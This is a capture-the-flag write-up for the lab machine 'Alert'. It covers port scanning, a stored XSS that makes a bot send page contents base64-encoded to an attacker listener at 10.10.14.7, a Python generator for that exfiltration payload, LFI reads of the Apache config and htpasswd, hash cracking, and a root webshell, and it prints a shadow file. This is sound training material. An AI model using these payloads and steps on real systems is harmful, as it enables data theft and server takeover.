Basic information

Port scan

Only 22 and 80 are open:

```
$ nmap -sC -sV -Pn 10.10.11.44
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-26 13:28 CST
Nmap scan report for 10.10.11.44
Host is up (0.078s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| 256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_ 256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://alert.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.11 seconds
```

80

The site redirects to alert.htb, so add a hosts entry first:

```
10.10.11.44 alert.htb
```

The site is an online markdown viewer:

Markdown Viewer

Markdown files have a share function, and when you enter a URL in the Contact form, something visits it automatically:

[image: xss]

So XSS is the obvious route: put the payload in a markdown file and hand the share URL to the bot.

At this point everything is unknown, so first make the bot fetch the application's home page and send the response back to us.

In the response there is a Messages link that our own panel does not show:

```html
<a href="index.php?page=messages">Messages</a>
```

So run the XSS again against the messages page, which yields a new file:

```html
<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>
```

The `file` parameter of messages.php is an obvious LFI:

LFI

Next is reading files through the LFI (via the bot, since messages.php is not reachable from our own session). Since the server is Apache, start with the default vhost config:

```
/etc/apache2/sites-enabled/000-default.conf
```

It contains the path of an htpasswd file.

Read the htpasswd file next:

```
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
```

The hash is Apache APR1 MD5 (hashcat mode 1600) and cracks to the password:

```
sudo hashcat -m 1600 hash.txt ~/Tools/dict/rockyou.txt

manchesterunited
```
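Hashcat mode 1600 is Apache's APR1 MD5 (`$apr1$`), the format `htpasswd -m` writes. The block below is an added example, not part of the original writeup: the algorithm in pure Python, so a cracked candidate can be confirmed against the htpasswd line offline and it is clear why cracking is cheap (MD5, only 1000 rounds, an 8-character salt). The htpasswd line is the one recovered above; the function and variable names are this example's own.

```python
import hashlib
import hmac

# crypt(3)-style alphabet used by md5-crypt and APR1 (not standard base64)
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"


def _to64(value: int, count: int) -> str:
    """Emit `count` sextets of `value`, least significant first (crypt's to64)."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password: str, salt: str) -> str:
    """Apache APR1 MD5 hash of `password`, i.e. what `htpasswd -m` produces."""
    pw = password.encode()
    salt = salt[:8]                      # htpasswd uses at most 8 salt characters
    sb = salt.encode()

    # alternate sum: md5(pw + salt + pw)
    alt = hashlib.md5(pw + sb + pw).digest()
    ctx = hashlib.md5(pw + MAGIC + sb)
    # mix in exactly len(pw) bytes of the alternate sum
    for _ in range(len(pw) // 16):
        ctx.update(alt)
    ctx.update(alt[: len(pw) % 16])
    # one byte per bit of len(pw): NUL if the bit is set, first pw byte if clear
    i = len(pw)
    while i:
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    # 1000 stretching rounds with the pw/salt schedule from md5-crypt
    for i in range(1000):
        ctx = hashlib.md5()
        ctx.update(pw if i & 1 else final)
        if i % 3:
            ctx.update(sb)
        if i % 7:
            ctx.update(pw)
        ctx.update(final if i & 1 else pw)
        final = ctx.digest()

    # bytes are interleaved before the custom base64 step
    out = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    out += _to64(final[11], 2)
    return f"$apr1${salt}${out}"


def verify_htpasswd(line: str, password: str) -> bool:
    """Check one 'user:$apr1$salt$hash' htpasswd line against a candidate."""
    user, _, stored = line.strip().partition(":")
    parts = stored.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError(f"{user}: not an APR1 hash")
    return hmac.compare_digest(apr1_md5(password, parts[2]), stored)


if __name__ == "__main__":
    # the line read through the LFI above, checked against hashcat's result
    HTPASSWD_LINE = "albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/"
    print(verify_htpasswd(HTPASSWD_LINE, "manchesterunited"))
```

The salt truncation and the interleaving step are where home-grown implementations usually go wrong; compare against `hashcat --show` or `openssl passwd -apr1 -salt bMoRBJOg` if in doubt.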

xss.md

```html
<script>
// fetch the target page inside the bot's browser, with the bot's cookies
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://alert.htb/', false);
xhr.withCredentials = true;
xhr.send();
// ship the base64-encoded response to our listener
var exfil = new XMLHttpRequest();
exfil.open("GET", "http://10.10.14.7:7777/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
</script>
```
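The same payload is reused three times above (home page, `index.php?page=messages`, then the LFI), changing only the URL. As an added example that is not part of the original writeup, here is a Python helper that generates xss.md for any target URL and decodes the `r=` query the listener receives. The listener address and target URLs are the ones from the page; one deliberate change from the payload above is that the base64 is wrapped in `encodeURIComponent()`, because raw `btoa()` output contains `+`, `/` and `=`, and a literal `+` in a query string is decoded as a space by most servers, corrupting the exfiltrated data.

```python
import base64
import json
import urllib.parse

# listener address from the payload above; change it to your own box
LISTENER = "http://10.10.14.7:7777/exfil"


def build_payload(target_url: str, listener: str = LISTENER) -> str:
    """Build the xss.md body: fetch target_url as the bot and post the body to us.

    Same idea as the payload above, hardened by percent-encoding the base64 so
    '+', '/' and '=' survive the query string.
    """
    target_js = json.dumps(target_url)            # JS string literal, quotes escaped
    listener_js = json.dumps(listener + "?r=")
    return (
        "<script>\n"
        "var xhr = new XMLHttpRequest();\n"
        f"xhr.open('GET', {target_js}, false);\n"
        "xhr.withCredentials = true;\n"
        "xhr.send();\n"
        "var exfil = new XMLHttpRequest();\n"
        f"exfil.open('GET', {listener_js} + encodeURIComponent(btoa(xhr.responseText)), false);\n"
        "exfil.send();\n"
        "</script>\n"
    )


def lfi_url(path: str, base: str = "http://alert.htb") -> str:
    """Target URL for the messages.php LFI; absolute paths work as shown above."""
    return f"{base}/messages.php?file=" + urllib.parse.quote(path, safe="/")


def decode_exfil_bytes(request_line: str) -> bytes:
    """Recover the raw page body from one request line seen by the listener,
    e.g. 'GET /exfil?r=PGgxPk1l... HTTP/1.1'.

    Handles both the percent-encoded payload built here and the raw btoa()
    form used above, where parse_qs turns a literal '+' into a space.
    """
    path = request_line.split()[1]
    query = urllib.parse.urlsplit(path).query
    b64 = urllib.parse.parse_qs(query, keep_blank_values=True)["r"][0]
    b64 = b64.replace(" ", "+")                  # undo '+' -> ' ' from parse_qs
    b64 += "=" * (-len(b64) % 4)                 # re-pad if '=' was lost in transit
    return base64.b64decode(b64)


def decode_exfil(request_line: str) -> str:
    """Text form: btoa() encodes the JS string as Latin-1, so decode it that way."""
    return decode_exfil_bytes(request_line).decode("latin-1")


if __name__ == "__main__":
    # step 1: the bot's view of the app; step 2: the hidden Messages page;
    # step 3: the Apache vhost config through the LFI
    for target in ("http://alert.htb/",
                   "http://alert.htb/index.php?page=messages",
                   lfi_url("/etc/apache2/sites-enabled/000-default.conf")):
        print(build_payload(target))
```

Run `python3 -m http.server 7777` (or `nc -lvnp 7777`) as the listener, paste the request line it logs into `decode_exfil`, and the page body comes back as text. Note that `btoa()` throws on characters above U+00FF, so a page with non-Latin-1 content needs a TextEncoder-based variant; the pages on this box are plain ASCII.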

user flag

albert reuses the password, so it works directly over SSH:

Privilege escalation enumeration

Listing listening ports shows a local-only 8080, and the process list shows it is PHP's built-in web server started by root:

```
albert@alert:~$ ss -tunlp
tcp LISTEN 0 4096 127.0.0.1:8080 0.0.0.0:*
albert@alert:~$ ps aux
root 1001 0.0 0.6 206768 24292 ? Ss 01:50 0:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor
```

Checking permissions shows that we can write to the config directory under website-monitor, so we can drop a file in there:

Privilege escalation & root flag

So write a PHP webshell into the config directory and request it through the server on 127.0.0.1:8080 (e.g. with curl from the SSH session); the built-in PHP server runs as root, so the commands it executes do too.

shadow

```
root:$6$gSjyQo8nJFMsegNG$jRRGms4KAq1FGTXwBJl236Ui5OKRtmaM3k8nkXuvduPXnhhaT/ZCYHHYO3GxhUAik1NaFYlBGaQZBrzQHgOhc/:19791:0:99999:7:::
albert:$6$ITP6P5Et1oVKsi7t$kEwgQPb4LUVcYb9MDHklHWKwDPvE6l7TGBUZogMvPoHUDt2IZ0ONlWODbsiTFdwd7SkYUNHGA0QS.Bnd6/tsp0:19822:0:99999:7:::
david:$6$oYlviwCQ3SMghmp.$95V3x9QjaD5GU8yoFsb8ufq9GrJ7PtcMAilTYtiNN2RZsVG0qgiWXUdlDURqdE84Nk2T11F4BpJXz3FbEK3bC1:20008:0:99999:7:::
```

References